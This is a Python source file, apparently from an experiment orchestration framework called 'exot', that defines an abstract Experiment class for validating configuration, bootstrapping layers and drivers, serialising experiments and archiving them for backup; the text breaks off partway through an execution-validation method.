# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import annotations
import abc
import concurrent.futures
import copy as cp
import datetime
import enum
import json
import os
import tarfile
import threading
import traceback
import typing as t
from functools import partial
from pathlib import Path
from time import sleep
import numpy as np
import toml
from exot.channel import Channel
from exot.driver import Driver, DriverFactory
from exot.exceptions import *
from exot.layer import LayerFactory
from exot.util.android import Intent
from exot.util.attributedict import AttributeDict
from exot.util.file import (
add_random,
add_timestamp,
backup as file_backup,
copy,
delete,
move,
move_action,
validate_root_path,
)
from exot.util.git import GitRepository
from exot.util.logging import Loggable, get_root_logger
from exot.util.misc import (
call_with_leaves,
dict_depth,
dict_diff,
get_valid_access_paths,
getitem,
isabstract,
leaves,
map_to_leaves,
setitem,
validate_helper,
)
from exot.util.mixins import (
Configurable,
HasParent,
IntermediatesHandler,
Pickleable,
SubclassTracker,
)
from exot.util.prompts import prompt
from exot.util.timeout import Timeout
from exot.util.wrangle import (
app_configfile_formatter,
app_log_formatter,
generic_log_formatter,
log_path_unformatter,
repetition_formatter,
run_path_formatter,
run_path_unformatter,
)
__all__ = ("Experiment", "Run")
"""
Experiment
----------
Base class for experiments. Responsible for:
- configuration parsing and validation,
- bootstrapping data processing layers, drivers, and channels,
- finding and validating environments,
- writing and reading serialised experiments,
- backing up the experiment.
Synopsis & signatures::
__init_subclass__ (*args, **kwargs) -> None
_create_drivers (self) -> 't.Mapping'
_get_environments (self, _ignore: 't.Optional[str]' = None)
_validate_environment (env: 't.Mapping') -> 't.NoReturn'
_validate_execute (self, env : str) -> 't.NoReturn'
backup (self, _with_logs: 'bool' = False, _with_results: 'bool' = False) -> 'None'
bootstrap (self) -> 'None'
bootstrap_logger (self, custom_filename: Union[str, NoneType] = None) -> None
configure_layers (self, **kwargs: 't.Any') -> 'None'
deserialise (source=typing.Union[str, bytes, pathlib.Path, typing.IO]) -> object
dump (self, file: io.IOBase) -> None
dumps (self) -> Union[str, bytes]
execute (self) -> 'None'
generate (self) -> 'None'
load (source: io.IOBase) -> object
loads (source: Union[str, bytes]) -> object
read (path: 'Path') -> 'Experiment'
required_config_keys () -> 'list'
required_layers () -> 'list'
serialise (self, file: Union[pathlib.Path, IO, NoneType] = None) -> Union[str, NoneType]
validate (self) -> 'None'
write (self) -> 'None'
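
Illustrative lifecycle (a hedged sketch, not code from this module; the concrete
subclass, channel, run type, and configuration source are placeholders, and the
`config` keyword is assumed to follow the Configurable mixin)::

    config = toml.load("experiment_config.toml")
    experiment = SomeConcreteExperiment(config=config, channel=SomeChannel(), run_type=SomeRun)
    # layers are bootstrapped automatically when a config is supplied at construction
    experiment.generate()   # populate `phases` with Run instances
    experiment.write()      # serialise under <root>/<save_path>/<name>
    experiment.execute()    # execute on all configured environments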
"""
class Experiment(
SubclassTracker,
Pickleable,
Configurable,
Loggable,
track="type",
serialise_stub=["_phases"],
metaclass=abc.ABCMeta,
):
@enum.unique
class Type(enum.IntEnum):
"""Experiment types"""
FrequencySweep = enum.auto()
Exploratory = enum.auto()
Performance = enum.auto()
RealWorld = enum.auto()
AppExec = enum.auto()
def __init_subclass__(cls, *args, **kwargs) -> None:
super().__init_subclass__(*args, **kwargs)
@property
def _config_general_standard(self):
return "STANDARD"
@property
def config(self):
if hasattr(self, "_config"):
setting_key = self._config_general_standard
if hasattr(self.layers, "io"):
if self.layers["io"].configured:
if "env" in self.layers["io"].config:
setting_key = self.layers["io"].config["env"]
if setting_key in self._config.EXPERIMENT.GENERAL:
elem_keys = list(self._config.EXPERIMENT.GENERAL[setting_key])
for elem_key in elem_keys:
self._config.EXPERIMENT.GENERAL[elem_key] = cp.deepcopy(
self._config.EXPERIMENT.GENERAL[setting_key][elem_key]
)
return self._config
else:
return None
@config.setter
def config(self, value):
self._config = AttributeDict(value)
elem_keys = list(self._config.EXPERIMENT.GENERAL)
if self._config_general_standard not in self._config.EXPERIMENT.GENERAL:
self._config.EXPERIMENT.GENERAL[self._config_general_standard] = AttributeDict()
for key in elem_keys:
if key != self._config_general_standard and key not in list(
self.environments.keys()
):
self._config.EXPERIMENT.GENERAL[self._config_general_standard][
key
] = cp.deepcopy(self._config.EXPERIMENT.GENERAL[key])
@config.deleter
def config(self):
if hasattr(self, "_config"):
delattr(self, "_config")
@property
def run_type(self):
"""Get the associated Run type"""
return self._run_type
@run_type.setter
def run_type(self, value):
"""Set the associated Run type"""
if not (isinstance(value, type) and issubclass(value, Run)):
raise TypeError("run type should be a subclass of Run")
self._run_type = value
def __init__(self, *args, **kwargs):
"""Initialise an Experiment object"""
# Validate root path
if "root_path" in kwargs:
self._root_path = Path(kwargs.pop("root_path"))
else:
self._root_path = Path(".")
validate_root_path(self.root_path)
if self.root_path != Path("."):
get_root_logger().warning(
"creating an experiment with a different root path might complicate "
"reading back"
)
if self.root_path.is_absolute():
get_root_logger().warning(
"creating an experiment with an absolute root path might be difficult "
"to read back by others"
)
# Check git status
if GitRepository.is_git_directory(self.root_path):
repo = GitRepository(self.root_path)
if repo.dirty:
get_root_logger().warning("the repository contains uncommited modifications!")
self._git = {"commit": repo.commit, "dirty": repo.dirty, "status": repo.status}
else:
get_root_logger().warning(
"root path is not a git directory, inconsistencies may occur!"
)
self._git = None
# Initialise the Configurable parent class
Configurable.__init__(self, *args, **kwargs)
# Loggable needs path methods to be available
Loggable.__init__(self, *args, **kwargs)
if "channel" in kwargs:
self.channel = kwargs.pop("channel")
self.channel.parent = self
if "drivers" in kwargs:
self.drivers = kwargs.pop("drivers")
if "run_type" in kwargs:
self.run_type = kwargs.pop("run_type")
self._layers = AttributeDict()
if self.configured:
self.bootstrap()
"""
Bootstrapping
-------------
Values that are always provided to layers at instantiation time:
    - the Channel,
    - the Channel's signal,
    - the sampling period.
Values that are optionally provided to layers at instantiation time:
- Keyword arguments provided to the `bootstrap` function.
"""
def bootstrap(self, **kwargs) -> None:
"""Parse configuration and create experiment layers using a layer factory"""
assert self.configured, "Experiment must be configured before bootstrapping"
assert self.channel, "Experiment must have a channel before bootstrapping"
# broadcast channel and channel's signal to all layers
_env = ""
for item in kwargs.values():
if "env" in item.keys():
_env = item["env"]
break
kwargs.update(
channel=self.channel,
environments_apps_zones=self.environments_apps_zones,
sampling_period=self.environment_config_general(_env).sampling_period,
)
layer_factory = LayerFactory()
layer_conf = self.config.EXPERIMENT.LAYERS
layer_types = {t.value: t for t in layer_factory.available_types}
for layer_k, layer_v in layer_conf.items():
try:
_type = {"_type": layer_types[layer_k]} if layer_k in layer_types else {}
self.layers[layer_k] = layer_factory(
layer_v.name, **_type, **{**layer_v.params, **kwargs}
)
self.logger.info(f"bootstrapped layer {layer_k!r} with {layer_v.name}")
except AttributeError as e:
self.logger.critical(
f"failed to bootstrap layer {layer_k!r} with {layer_v.name}"
)
# Handle missing EXPERIMENT.LAYERS.* as misconfiguration
raise MisconfiguredError(e.args)
self._runtime_encode = AttributeDict(
_ for _ in self.layers.items() if _[1].requires_runtime_config[0]
)
self._runtime_decode = AttributeDict(
_ for _ in self.layers.items() if _[1].requires_runtime_config[1]
)
self.logger.debug(f"layers with runtime encoding: {list(self._runtime_encode)}")
self.logger.debug(f"layers with runtime decoding: {list(self._runtime_decode)}")
self._bootstrapped = True
@property
def bootstrapped(self) -> bool:
"""Are the experiment layers bootstrapped?"""
return getattr(self, "_bootstrapped", False)
@property
def layers(self) -> AttributeDict:
"""Get experiment layers"""
return getattr(self, "_layers", None)
@property
def layers_with_runtime_encoding(self) -> AttributeDict:
"""Get experiment layers that require configuration at runtime"""
return getattr(self, "_runtime_encode", AttributeDict())
@property
def layers_with_runtime_decoding(self) -> AttributeDict:
"""Get experiment layers that require configuration at runtime"""
return getattr(self, "_runtime_decode", AttributeDict())
def configure_layers_encoding(self, **kwargs: t.Any) -> None:
"""Configure layers with runtime-configurable encoding"""
for layer in self.layers_with_runtime_encoding:
if layer in kwargs:
self.layers_with_runtime_encoding[layer].config = kwargs.get(layer, {})
else:
self.logger.debug("layer {layer!r} encoding not runtime-configurable")
def configure_layers_decoding(self, **kwargs: t.Any) -> None:
"""Configure layers with runtime-configurable decoding"""
for layer in self.layers_with_runtime_decoding:
if layer in kwargs:
self.layers_with_runtime_decoding[layer].config = kwargs.get(layer, {})
else:
self.logger.debug("layer {layer!r} decoding not runtime-configurable")
def __repr__(self) -> str:
"""Get a string representation of the Experiment"""
channel = getattr(self, "_channel", None)
channel = channel.__class__.__name__ if channel else "no"
configured = "configured" if self.configured else "not configured"
return (
f"<{self.__class__.__name__} at {hex(id(self))} "
f"with {channel} channel, {configured}>"
)
@property
def required_config_keys(self) -> list:
"""Gets the required config keys
Returns:
list: The required keys
"""
return ["name", "save_path", "EXPERIMENT", "ENVIRONMENTS"]
@staticmethod
def required_layers() -> list:
"""Which layers are required? Used in verification/validation"""
return []
@property
def estimated_delays_duration(self) -> float:
"""Gets the estimated duration of the defined delays
Returns:
float: The estimated delay in seconds
"""
if self.configured:
return (
self.config.EXPERIMENT.GENERAL.delay_after_spawn
if "delay_after_spawn" in self.config.EXPERIMENT.GENERAL
else 1.0
) + (
self.config.EXPERIMENT.GENERAL.delay_after_auxiliary
if "delay_after_auxiliary" in self.config.EXPERIMENT.GENERAL
else 1.0
)
else:
return 0.0
def validate(self) -> None:
"""Check if the supplied Experiment config is valid
Implements the `validate` method from Configurable.
"""
if not self.configured:
raise ConfigMissingError("'validate' called on an unconfigured Experiment")
validate = partial(validate_helper, self.config, msg="Experiment")
# top-level configuration
validate("name", str)
validate("save_path", str)
validate("log_path", str, type(None))
validate("backup_path", str, type(None))
validate("experiment_exists_action", str, type(None))
validate("EXPERIMENT", AttributeDict)
validate("ENVIRONMENTS", AttributeDict)
validate(("EXPERIMENT", "GENERAL"), AttributeDict)
validate(("EXPERIMENT", "GENERAL", "timeout_duration"), (int, float, type(None)))
validate(("EXPERIMENT", "GENERAL", "delay_after_spawn"), (int, float, type(None)))
validate(("EXPERIMENT", "GENERAL", "delay_after_auxiliary"), (int, float, type(None)))
validate(("EXPERIMENT", "GENERAL", "active_wait"), (bool, type(None)))
validate(("EXPERIMENT", "GENERAL", "stagger"), (bool, type(None)))
# environments configuration
for k in self.config["ENVIRONMENTS"]:
validate(("ENVIRONMENTS", k), AttributeDict)
validate(("ENVIRONMENTS", k, "APPS"), AttributeDict)
for app in self.config["ENVIRONMENTS"][k]["APPS"]:
validate(("ENVIRONMENTS", k, "APPS", app, "executable"), str)
validate(("ENVIRONMENTS", k, "APPS", app, "zone"), str)
validate(("ENVIRONMENTS", k, "APPS", app, "type"), str, type(None))
validate(
("ENVIRONMENTS", k, "APPS", app, "start_individually"), bool, type(None)
)
current_app_config = self.config["ENVIRONMENTS"][k]["APPS"][app]
if "type" in current_app_config:
if current_app_config["type"] not in ["local", "standalone"]:
raise MisconfiguredError(
f"App {app!r} in section 'APPS' of environment {k!r} "
f"has incompatible type: {current_app_config['type']!r}, "
f"allowed types: ['local', 'standalone']."
)
if current_app_config["type"] == "local":
validate(("ENVIRONMENTS", k, "APPS", app, "sched"), str, type(None))
else:
validate(("ENVIRONMENTS", k, "APPS", app, "args"), list, type(None))
# experiment configuration
validate(("EXPERIMENT", "type"), str)
validate(("EXPERIMENT", "channel"), str)
validate(("EXPERIMENT", "PHASES"), AttributeDict)
validate(("EXPERIMENT", "LAYERS"), AttributeDict)
missing_layers = [
layer
for layer in self.required_layers()
if layer not in self.config["EXPERIMENT"]["LAYERS"]
]
if missing_layers:
raise MisconfiguredError(f"required layers missing: {missing_layers!r}")
for k in self.config["EXPERIMENT"]["LAYERS"]:
validate(("EXPERIMENT", "LAYERS", k), AttributeDict)
validate(("EXPERIMENT", "LAYERS", k, "name"), str)
validate(("EXPERIMENT", "LAYERS", k, "params"), t.Mapping)
# backup configuration
if "BACKUP" in self.config:
for k in self.config["BACKUP"]:
validate(("BACKUP", k), str)
@staticmethod
def _validate_environment(env: t.Mapping) -> t.NoReturn:
"""Check if provided environment conforms to the specification"""
validate = partial(validate_helper, msg="Environment")
for var in env.values():
# platform
validate(var, "model", str)
validate(var, "cores", t.List)
validate(var, "frequencies", t.List)
validate(var, "schedule_tag", str)
# paths
validate(var, "path_apps", str)
validate(var, "path_data", str)
# driver settings
validate(var, "driver_type", str)
validate(var, "driver_params", t.Mapping)
if var["driver_type"] in ["SSHUnixDriver", "ADBAndroidDriver"]:
# connection
validate(var, ("driver_params", "ip"), str)
validate(var, ("driver_params", "port"), int)
validate(var, ("driver_params", "user"), str)
validate(var, ("driver_params", "group"), str)
validate(var, ("driver_params", "key"), str)
validate(var, ("driver_params", "gateway"), type(None), str)
def _get_environments(self, _ignore: t.Optional[str] = None):
"""Read environments from exot's root directory"""
environments = AttributeDict()
env_dir = self.root_path / "environments"
files = [f for f in env_dir.glob("*.toml") if not f.stem == _ignore]
for file in files:
_ = toml.load(file)
self._validate_environment(_)
environments[file.stem] = AttributeDict.from_dict(_)
return environments
@property
def environments(self) -> AttributeDict:
"""Get available environments"""
if not hasattr(self, "_environments"):
self._environments = AttributeDict.from_dict(self._get_environments())
return self._environments
@environments.setter
def environments(self, value: t.Mapping):
"""Set available environments"""
if not isinstance(value, t.Mapping):
raise TypeError(
f"only a mapping can be assigned to environments, got: {type(value)}"
)
for v in value.values():
self._validate_environment(v)
self._environments = AttributeDict.from_dict(value)
@property
def environments_apps_zones(self) -> t.Mapping:
"""Get a mapping with environments, apps, zones and zone configs
Returns:
t.Mapping: A mapping with the following structure:
- Mapping depth 1: environment name
- Mapping depth 2: apps in the environment
- Mapping depth 3: app zone, zone_config, and app_config,
standalone, sched
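            Example (illustrative only; environment and app names are placeholders)::

                {"my_env": {"my_app": {
                    "executable": "app.bin", "type": "local", "zone": "host",
                    "args": [], "zone_config": {...}, "app_config": {...},
                    "standalone": False, "start_individually": False,
                    "sched": None, "is_unix": True, "is_android": False}}}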
"""
_out = {_: {} for _ in self.config.ENVIRONMENTS}
for env in self.config.ENVIRONMENTS:
for app in self.config.ENVIRONMENTS[env]["APPS"]:
_app = self.config.ENVIRONMENTS[env]["APPS"][app]
_zone = _app.zone
_type = _app.get("type", "local")
_start_individually = _app.get("start_individually", False)
if env not in self.environments:
raise MisconfiguredError(
f"The environment {env!r} for app {app!r} is not available; "
f"Available environments: {list(self.environments.keys())!r}"
)
if _zone not in self.environments[env]:
raise MisconfiguredError(
"zone {!r} is not available in environment {!r}".format(_zone, env)
)
_is_standalone = _type == "standalone"
_app_config = {}
if app in self.config.ENVIRONMENTS[env]:
_app_config = self.config.ENVIRONMENTS[env][app]
elif not _is_standalone and app not in self.config.ENVIRONMENTS[env]:
those_that_have = [_ for _ in self.config.ENVIRONMENTS[env] if _ != "APPS"]
raise MisconfiguredError(
f"App {app!r} requires a corresponding configuration in ENVIRONMENTS; "
f"Apps that do have one: {those_that_have!r}"
)
_sched = _app.get("sched", None)
_sched = Path(_sched).name if _sched else _sched
driver_t = self.environments[env][_zone]["driver_type"].lower()
is_unix = "unix" in driver_t
is_android = "android" in driver_t
if not any([is_unix, is_android]):
raise RuntimeError(
f"Both not unix and not Android? Driver type: {driver_t}"
)
_out[env].update(
{
app: {
"executable": _app["executable"],
"type": _type,
"zone": _zone,
"args": _app.get("args", []),
"zone_config": self.environments[env][_zone],
"app_config": _app_config,
"standalone": _is_standalone,
"start_individually": _start_individually,
"sched": _sched,
"is_unix": is_unix,
"is_android": is_android,
}
}
)
return AttributeDict.from_dict(_out)
@property
def available_environments(self) -> list:
"""Get names of available environments"""
assert self.config, "Config must be read first"
assert self.environments, "Environment configurations need to be read first"
envs = list()
for env in self.config.ENVIRONMENTS:
if env not in self.environments:
raise MisconfiguredError(
f"The environment {env} is not in defined environments: "
f"{list(self.environments.keys())}"
)
envs.append(env)
return envs
def environment_config_general(self, env: str) -> AttributeDict:
"""Provides an environment-specific proxy to the general experiment config
Args:
env (str): The environment
Returns:
AttributeDict: The root or environment-specific config
"""
if env in self.config.EXPERIMENT.GENERAL.keys():
environment_config_general = self.config.EXPERIMENT.GENERAL.copy()
for key in environment_config_general[env]:
environment_config_general[key] = environment_config_general[env][key]
del environment_config_general[env]
return environment_config_general
else:
return self.config.EXPERIMENT.GENERAL
@property
def name(self) -> t.Optional[str]:
"""Get experiment name"""
return self.config.name if self.configured else None
@property
def save_path(self) -> t.Optional[Path]:
"""Get save path for experiments"""
return Path.joinpath(self.root_path, self.config.save_path) if self.configured else None
@property
def log_path(self) -> t.Optional[Path]:
"""Get experiment log path"""
if self.configured:
if "log_path" in self.config:
return Path(self.config.log_path)
else:
return Path.joinpath(self.save_path, "_logs")
else:
return None
@property
def path(self) -> t.Optional[Path]:
"""Get the save path of the particular Experiment"""
return Path.joinpath(self.save_path, self.config.name) if self.configured else None
@property
def root_path(self) -> t.Optional[Path]:
"""Get the exot root path"""
return self._root_path
def remote_path(self, env: str, zone: str) -> Path:
"""Get a remote experiment path given an environment and a zone"""
assert isinstance(env, str)
assert isinstance(zone, str)
assert env in self.config.ENVIRONMENTS, "env in config.ENVIRONMENTS"
assert env in self.environments, "env in environments"
assert zone in self.environments[env], "zone in env"
return self.remote_save_path(env, zone) / self.path.relative_to(self.save_path)
def remote_save_path(self, env: str, zone: str) -> Path:
"""Get a remote experiment path given an environment and a zone"""
assert isinstance(env, str)
assert isinstance(zone, str)
assert env in self.config.ENVIRONMENTS, "env in config.ENVIRONMENTS"
assert env in self.environments, "env in environments"
assert zone in self.environments[env], "zone in env"
return Path(self.environments[env][zone].path_data)
@property
def channel(self) -> Channel:
"""Get the configured channel"""
return getattr(self, "_channel", None)
@channel.setter
def channel(self, value: Channel) -> None:
"""Set the experiment channel"""
if not isinstance(value, Channel):
raise TypeError("'channel' should be a Channel-type", value)
self._channel = value
@property
def drivers(self) -> t.Optional[AttributeDict]:
"""Get the experiment drivers
Returns:
t.Optional[AttributeDict]: A mapping: env: str -> zone: str -> driver: Driver
"""
return getattr(self, "_drivers", None)
@drivers.setter
def drivers(self, value: [t.Mapping[str, t.Mapping[str, Driver]]]) -> None:
"""Set the experiment drivers
Args:
value (t.Mapping[str, t.Mapping[str, Driver]]):
A mapping: env: str -> zone: str -> driver: Driver
Raises:
ExperimentTypeError: If keys have wrong types
            ExperimentValueError: If an environment or zone is not available
WrongDriverError: If a leaf is not a Driver instance
"""
_paths = get_valid_access_paths(value, _leaf_only=False)
_leaves = leaves(value)
if not all(all(isinstance(_, str) for _ in __) for __ in _paths):
raise ExperimentTypeError("wrong paths in mapping (must be str)", value)
if not all(isinstance(_, Driver) for _ in _leaves):
raise WrongDriverError("drivers must be instances of Driver", value)
_first_level_keys = [_[0] for _ in _paths if len(_) == 1]
_second_level_keys = [_[1] for _ in _paths if len(_) == 2]
for env in _first_level_keys:
if env not in self.environments:
raise ExperimentValueError(f"supplied driver env {env} not available")
for zone in _second_level_keys:
if zone not in [v.zone for v in self.config.APPS.values()]:
raise ExperimentValueError(f"supplied driver zone {zone} not in config")
self._drivers = AttributeDict.from_dict(value)
@property
def phases(self) -> t.Dict:
"""Get experiment phases"""
return getattr(self, "_phases", None)
@phases.setter
def phases(self, value: t.Dict) -> None:
"""Set experiment phases"""
if not isinstance(value, t.Dict):
raise ExperimentValueError(
"value set to 'phases' must be a dict-like object", value
)
self._phases = value
@property
def _update_mode(self) -> bool:
return self.config.experiment_exists_action == "update"
def write(self) -> None:
"""Serialise the experiment"""
assert self.configured, "Experiment must be configured before writing"
assert self.bootstrapped, "Experiment must be bootstrapped before writing"
if any(isabstract(layer) for layer in self.layers):
raise SerialisingAbstractError("cannot serialise abstract classes")
# handle existing experiment path
if self.path.exists():
# experiment_exists_action exists in the config
if hasattr(self.config, "experiment_exists_action"):
if self.config.experiment_exists_action == "overwrite":
self.logger.info(
f"experiment path '{self.path}' already exists, will be overwritten"
)
delete(self.path)
elif self.config.experiment_exists_action == "move":
self.logger.info(move_action(self.path))
elif self.config.experiment_exists_action == "update":
pass
else:
raise ExperimentAbortedError("experiment directory existed")
# experiment_exists_action does not exist in the config, prompt user
else:
proceed = prompt(
f"destination path {self.path} exists, move the old one and proceed"
)
if proceed:
self.logger.info(move_action(self.path))
else:
raise ExperimentAbortedError("experiment directory existed")
if not self._update_mode:
if self.path.exists():
raise ExperimentRuntimeError(f"{self.path} shouldn't exist before serialising")
self.path.mkdir(parents=True, exist_ok=self._update_mode)
# NOTE [ACCESS_PATHS]: saving these might not be eventually required
# NOTE: generator objects cannot be pickled/serialised
self._phases_access_paths = list(get_valid_access_paths(self.phases, _leaf_only=True))
# fmt: off
# Write the experiment's configuration, metadata, and available environments
with self.path.joinpath("_configuration.toml").open("w") as cfgfile,\
self.path.joinpath("_metadata.toml").open("w") as gitfile,\
self.path.joinpath("_environments.toml").open("w") as envfile:
toml.dump(self.config.as_dict(), cfgfile)
toml.dump({"git": self._git}, gitfile)
toml.dump(self.environments.as_dict(), envfile)
# fmt: on
# Serialise the experiment object
pickle_path = self.path / "_experiment.pickle"
self.serialise(pickle_path)
self.logger.debug(f"serialised experiment '{self.name}' to '{pickle_path}'")
# Serialise all 'owned' Run objects
def call_run_write(run):
if not isinstance(run, Run):
raise ExperimentTypeError("a run in phases not an instance of Run", run)
run.write()
call_with_leaves(call_run_write, self.phases)
@classmethod
def read(
cls,
path: Path,
new_root_path: t.Optional[Path] = None,
*,
diff_and_replace: bool = False,
) -> Experiment:
"""Read a serialised Experiment and produce an Experiment instance
Args:
path (Path): The path to the serialised experiment
new_root_path (t.Optional[Path], optional): A new root path
diff_and_replace (bool, optional): Do file diff and replace values from the instance with those from files?
Returns:
Experiment: A restored instance of Experiment
Raises:
WrongRootPathError: If saved and current root paths cannot be resolved
"""
instance = cls.deserialise(path)
get_root_logger().info(f"unpicked an experiment instance {instance}")
_original_cwd = Path.cwd()
if new_root_path and new_root_path.resolve() != _original_cwd:
os.chdir(new_root_path)
# Handle reading experiments from moved directories, especially those moved
        # automatically by the framework. `path.parts[-1]` is the pickle file.
#
# Note: this may fail when there are stark differences in how experiments are placed.
_save_path = path.parts[-3]
_name = path.parts[-2]
if instance.config.save_path != _save_path:
instance.config.save_path = _save_path
if instance.config.name != _name:
instance.config.name = _name
try:
# Check if the current and the saved root path resolve to a valid root path
validate_root_path(instance.root_path)
if new_root_path:
instance._root_path = new_root_path
except WrongRootPathError:
get_root_logger().critical(
f"the pickled root path {cls.root_path} and current working directory "
f"'{Path.cwd()}' does not resolve to a valid root path."
)
raise WrongRootPathError(Path.cwd() / instance.root_path)
finally:
os.chdir(_original_cwd)
_need_bootstrap = False
# Check if saved config differs from that in the file
contained_config = instance.path / "_configuration.toml"
if contained_config.exists() and diff_and_replace:
config_from_directory = toml.load(contained_config)
differences = dict_diff(instance.config, config_from_directory)
if differences:
_need_bootstrap = True
get_root_logger().warning(
f"configs from pickle and directory differ at {differences!r}"
)
instance.config = config_from_directory
# Check if saved environments differ from those in the file
contained_environments = instance.path / "_environments.toml"
if contained_environments.exists() and diff_and_replace:
environments_from_directory = toml.load(contained_environments)
differences = dict_diff(instance.environments, environments_from_directory)
if differences:
_need_bootstrap = True
get_root_logger().warning(
f"environments from pickle and directory differ at {differences!r}"
)
instance.environments = environments_from_directory
# Check status of the git repository
if getattr(instance, "_git", None):
if GitRepository.is_git_directory(instance.root_path):
repo = GitRepository(instance.root_path)
if repo.commit != instance._git["commit"]:
get_root_logger().error(
"git commit of unpickled experiment repo '{}' does not match "
"the commit in which the unpickling was performed '{}'".format(
instance._git["commit"][:8], repo.commit[:8]
)
)
if repo.dirty:
get_root_logger().warning("unpickling in a dirty git repository")
else:
get_root_logger().warning(
f"unpickled in a directory that is not a git directory"
)
if _need_bootstrap:
instance.bootstrap()
# Populate the experiment phases and read existing Run's
instance.phases = {tag: {} for tag in instance.config.EXPERIMENT.PHASES}
instance.estimated_duration = {
tag: instance.config.EXPERIMENT.GENERAL.delay_after_bootstrap
if "delay_after_bootstrap" in instance.config.EXPERIMENT.GENERAL
else 10.0
for tag in instance.config.EXPERIMENT.PHASES
}
# Deserialise all contained Runs
for pickled_run in instance.path.rglob("*/_run.pickle"):
run_query = run_path_unformatter(pickled_run)
# NOTE [ACCESS_PATHS]: setitem will only allow setting existing keys, but
# these can be checked explicitly, as long as access paths are available.
if not (run_query in instance._phases_access_paths):
get_root_logger().warning(f"{run_query!r} must be a valid query")
setitem(
instance.phases,
run_query,
instance.run_type.read(pickled_run, parent=instance),
force=True,
)
instance._phases_access_paths = list(
get_valid_access_paths(instance.phases, _leaf_only=True)
)
return instance
def backup(self, _with_logs: bool = False, _with_results: bool = False) -> None:
"""Archive an Experiment and, if possible, upload to a backup server
Args:
_with_logs (bool, optional): Backup contained experiment logs?
_with_results (bool, optional): Backup contained experiments results?
Raises:
InvalidBackupPathError: If backup path is invalid
"""
assert self.configured, "experiment must be configured before backing up"
assert self.path.exists(), "experiment must be serialised before backing up"
if getitem(self.config, "backup_path", None):
where = self.root_path / Path(self.config.backup_path)
else:
where = self.save_path / "_backup"
if not where.is_dir():
try:
where.mkdir(parents=True)
except OSError as e:
_ = InvalidBackupPathError(f"backup path '{where}' not valid")
_.args += (e, e.args)
raise _
file = Path("{}.tbz".format(self.config.name))
file = add_timestamp(file)
path = Path.joinpath(where, file)
self.logger.info(f"archiving experiment '{self.name}' in '{path}'")
files_to_backup = (
f
for f in self.path.glob("**/*.*")
if not (
(_with_logs and "_logs" in f.parent.parts)
or (_with_results and "_results" in f.parent.parts)
)
)
with tarfile.open(path, "x:bz2") as _:
for file in files_to_backup:
_.add(file)
# If BACKUP section is available in the config, attempt to send the archive
if self.configured and "BACKUP" in self.config:
self.logger.info(f"sending experiment '{self.name}' archive to remote backup")
_ = file_backup(path, self.config.BACKUP.as_dict())
if not _.ok:
self.logger.error(
f"failed to send experiment archive, exited: {_.exited}, "
f"stderr: {_.stderr}"
)
@abc.abstractmethod
def generate(self) -> None:
"""Populate the experiment phases and instantiate Run's
Preconditions:
- The experiment should be configured and bootstrapped.
"""
pass
"""
The following methods are used to estimate the duration of the experiment.
"""
@property
def estimated_duration(self) -> t.Dict:
"""Get durations of experiment phases"""
return getattr(self, "_estimated_duration", None)
@estimated_duration.setter
def estimated_duration(self, value: t.Dict) -> None:
"""Set experiment phases"""
if not isinstance(value, t.Dict):
raise ExperimentValueError(
"value set to 'duration' must be a dict-like object", value
)
self._estimated_duration = value
def print_duration(self) -> None:
"""Prints the estimated experiment duration
"""
assert self.estimated_duration, "Experiment must be generated first"
total_duration = 0
for phase in self._estimated_duration:
time = datetime.timedelta(seconds=self.estimated_duration[phase])
self.logger.info(
f"Estimated duration of a single repetition of the {phase} phase is {str(time)}"
)
total_duration += (
self._estimated_duration[phase]
* self.config["EXPERIMENT"]["PHASES"][phase]["repetitions"]
)
time = datetime.timedelta(seconds=(total_duration))
self.logger.info(
f"This results in a total estimated duration of {str(time)} for all repetitions."
)
def map_to_runs(
self, function: t.Callable[[t.Any], t.Any], *, parallel: bool = True
) -> t.Generator:
"""Map a function to the Runs concurrently
Args:
function (t.Callable[[t.Any], t.Any]): A callable with sig. (Any) -> Any
parallel (bool, optional): run callable concurrently?
Returns:
t.Generator: The executor map generator
"""
if parallel:
with concurrent.futures.ThreadPoolExecutor(
thread_name_prefix="MapperThread"
) as executor:
return executor.map(function, leaves(self.phases))
else:
return map(function, leaves(self.phases))
def _create_drivers(self) -> t.Mapping:
"""Create experiment drivers
Returns:
t.Mapping: A mapping with environment as the 1st level, zone as the 2nd,
leaves are Driver objects created with a DriverFactory
Raises:
DriverCreationError: If driver could not be instantiated
"""
assert self.configured, "must be configured before adding drivers"
assert self.environments, "must have environments before adding drivers"
driver_factory = DriverFactory()
drivers = {k: {} for k in self.config.ENVIRONMENTS}
for env in drivers:
for app in self.config.ENVIRONMENTS[env].APPS:
try:
_zone = self.config.ENVIRONMENTS[env].APPS[app].zone
_zone_params = self.environments[env][_zone]
_driver_type = _zone_params["driver_type"]
_driver_params = _zone_params["driver_params"]
drivers[env][_zone] = driver_factory(_driver_type, backend=_driver_params)
except (KeyError, AttributeError) as e:
raise DriverCreationError(e)
return drivers
def _validate_execute(self, env: str) -> t.NoReturn:
"""Verify that the experiment can be executed
Also creates drivers, if they're not available.
Raises:
ExperimentRuntimeError: If an experiment Run is not digested
MisconfiguredError: If the execution cannot be performed due to config
"""
assert self.configured, "must be configured before execution"
assert self.bootstrapped, "must be bootstrapped before execution"
assert self.environments, "must have environments before execution"
# check for missing environments
_ = [env_k for env_k in self.config.ENVIRONMENTS if env_k not in self.environments]
if _:
msg = "environments {m!r} in config not in available ({a!r})".format(
m=_, a=list(self.environments.keys())
)
self.logger.critical(msg)
raise MisconfiguredError(msg)
# check for missing zones
for env_k in self.config.ENVIRONMENTS:
